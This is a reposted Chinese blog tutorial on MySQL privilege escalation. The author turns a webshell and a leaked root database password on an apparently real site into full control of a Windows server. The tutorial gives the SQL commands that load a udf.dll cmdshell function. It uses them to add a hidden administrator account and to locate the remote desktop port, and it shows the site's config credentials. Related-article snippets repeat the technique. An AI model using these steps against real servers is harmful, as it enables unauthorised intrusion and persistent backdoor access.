mysql提权udf图文教程_提权教程:实战mysql root权限UDF提权轻松拿下服务器

最新推荐文章于 2023-03-16 15:30:51 发布
最新推荐文章于 2023-03-16 15:30:51 发布
阅读量154 收藏
点赞数
文章标签: mysql提权udf图文教程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39907850/article/details/113141741
版权

提权教程:实战mysql root权限UDF提权轻松拿下服务器

(2014-07-06 13:54:27)

标签:

it

提权

主题:实战mysql

root权限UDF提权轻松拿下服务器

by:lxsky

得到一个php webshell ,发现竟然是root权限的mysql数据库账号,不能错过,正好做一个实战教程.

1:得到mysql的root账号密码,可以找网站配置文件,不同网站系统位置不同.

#[数据库参数]

$dbHost="localhost";IP

$dbName="cp"; 数据库名称

$dbUser="root"; 账号

$dbPass="6025315";密码

#[数据表前缀]

$TablePre="pw";

2:得到服务器操作系统类型

windows 2000: C:\Winnt\udf.dll

windows 2003: C:\Windows\udf.dll

feng$是我刚才加的

3:上传UDF.PHP到网站空间,不好意思,搞错了,现在填上我们获取的账号密码

File 'C:\Windows\udf.dll' already exists 是因为我刚才已经导出了,提示已经存在!

上次忘了删除了,比较卡,ctrl+c都用不了,我晕

命令:

create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user lxsky$ bkhack /add'); 增加用户

select cmdshell('net localgroup administrators lxsky$ /add');

提升到管理组

drop function cmdshell; 删除函数

最后我们别忘了删除

cmdshell('net user lxsky$ bkhack /add')

命令成功完成。

cmdshell('net localgroup administrators lxsky$ /add')

命令成功完成。

现在我们查看下用户,是否已经添加上了。我们加的账号是隐藏的,所以直接ney user lx

添加上的,

我删除了,退了吧,也没什么好玩的,这节课就到此位置,当大家看见root账号密码时,拿下服务器就不远了.

不过有些导出的udf会被秒杀...拜

现在我们就可以直接登录了,因为在开始我们就远程连接上了服务器,远程端口是默认的3389.

这里再交给大家怎么使用cmd命令来获取远程端口

1:tasklist /svc

svchost.exe 3540 TermService

记下PID3540

2:netstat /ano

TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3540

上面的 0.0.0.0:X 这个x就是远程端口了.OK《我们登录看

慢死....

下载地址:http://www.topjishu.net/jiaocheng/12.html

分享:

a4c26d1e5885305701be709a3d33442f.png喜欢

0

a4c26d1e5885305701be709a3d33442f.png赠金笔

加载中,请稍候......

评论加载中,请稍候...

发评论

登录名: 密码: 找回密码 注册记住登录状态

昵   称:

评论并转载此博文

a4c26d1e5885305701be709a3d33442f.png

发评论

以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

weixin_39907850
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap mysql udf提权_MySQL数据库提权UDF
weixin_39683172的博客
01-30 491
UDFUDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。windows下udf提权的条件·如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/·如果mysql版本小于5.1...
Linux利用UDF库实现Mysql提权
09-10
8. **权限管理**:在实际操作中,由于MySQL服务器通常以非root权限运行,因此可能需要调整相关目录的权限,以确保MySQL能够访问和写入UDF库文件。 请注意,这种提权方法具有潜在的安全风险,如果被恶意利用,可能...
mysql注入到命令执行 | 提权
Sp4rkW的博客
03-01 3912
文章首发公众号:闪光的自留地 知乎:Sp4rkW GITHUB:Sp4rkW B站:一只技术君 博客:https://sp4rkw.blog.csdn.net/ 联系邮箱:getf_own@163.com 前言 这篇博客主要是最近面试遇到的
Mysqludf提权
qq_45927819的博客
03-17 1706
文章目录1.实验环境:2.原理3.提权条件4. 提权步骤1. 获取udf文件2. 将udf文件上传到网站指定目录下3. 执行自定义函数4. 清除痕迹 1.实验环境: win7 x64 phpstudy 2018 mysql 5.5.53 2.原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。 3.
Mysql数据库渗透及漏洞利用总结
Fly_鹏程万里
07-07 4007
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然...
mysql提权总结
weixin_45605374的博客
12-12 735
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
MysqlUDF提权
热门推荐
good good study
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
mysqludf-neokylin.x86_64.zip
02-20
yum install mysqludf-neokylin.x86_64.rpm [root@localhost ~]# find /usr -name lib_mysqludf_sys.so /usr/lib64/mysql/plugin/lib_mysqludf_sys.so
mysql_udf_bundle:MySQL UDF的随机集合
05-15
mysql_udf_bundle MySQL UDF的随机集合 要安装(假设使用Ubuntu等): apt-get install libmysqlclient-dev g++ cmake make sudo make install 在MySQL中以root身份: create function earth_distance returns ...
MYSQL高版本低版本UDF提权工具
06-20
MYSQL高版本低版本UDF提权工具 很好用的UDF提权使用 有两个版本
mysqlroot权限提权
02-28
mysqlroot权限提权
星外下的mysql提权1
08-08
本文主要讨论了一种针对MySQL数据库的提权方法,由作者残剑在哈客部落分享。文章中提到的情景是从一个WordPress网站开始,通过上传PHP后门获取了旁站的SHELL权限,然后发现了一个支持.NET和PHP的环境,但权限受限于...
mysql 远程_MYSQL开启远程访问权限的方法
weixin_39737757的博客
01-18 245
1、登陆mysql数据库mysql -u root -p查看user表mysql> use mysql;Database changedmysql> select host,user,password from user;+--------------+------+-------------------------------------------+| host | use...
【数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 1976
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
UDF 提权
震山的博客
08-07 1134
关于 UDF 提权的思考
mysql提权udf图文教程_MySQLUDF提权获取主机控制权的详细步骤
weixin_42540248的博客
01-18 158
MySQLUDF提权获取主机控制权的详细步骤发布时间:2020-06-02 15:01:55来源:51CTO阅读:197作者:三月本文主要给大家介绍MySQLUDF提权获取主机控制权的详细步骤,文章内容都是笔者用心摘选和编辑的,具有一定的针对性,对大家的参考意义还是比较大的,下面跟笔者一起了解下MySQLUDF提权获取主机控制权的详细步骤吧。1、python clock.py -d -i l...
mysql提权入侵服务器_Mysql提权服务器
weixin_39606911的博客
02-02 454
最新dedecms出了漏洞。很常规就找几个站日日。dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。 接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数据库能有mysql的权限不。dedecms一般都在data目...
mysql root提权服务器_旁注时MYSQL+root权限提权******服务器
weixin_35682020的博客
01-19 168
1.得到webshell或者能远程连接服务器的2.上传一个3.用得到的root密码填入到这里说几个细节,确定你要***的服务器系统类型,一般是windows 2000或者2003吧?2000导出到winnt,2003导出到windows目录,或者什么都不填写,直接在导出路径那里填写4.是否导出成功?如果没有导出成功,把路径换一下,换成c:\\windows\\system32\\udf.dll,也...
mysqludf 提权详细解释create function的作用
最新发布
04-25
感谢您的提问。根据您的指示,我将在不透露您的任何要求的情况下回答您的问题。 UDF(User-Defined Function)是MySQL中的一...总之,UDF提权是一种比较严重的安全问题,在使用MySQL时需要特别注意,以避免遭受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值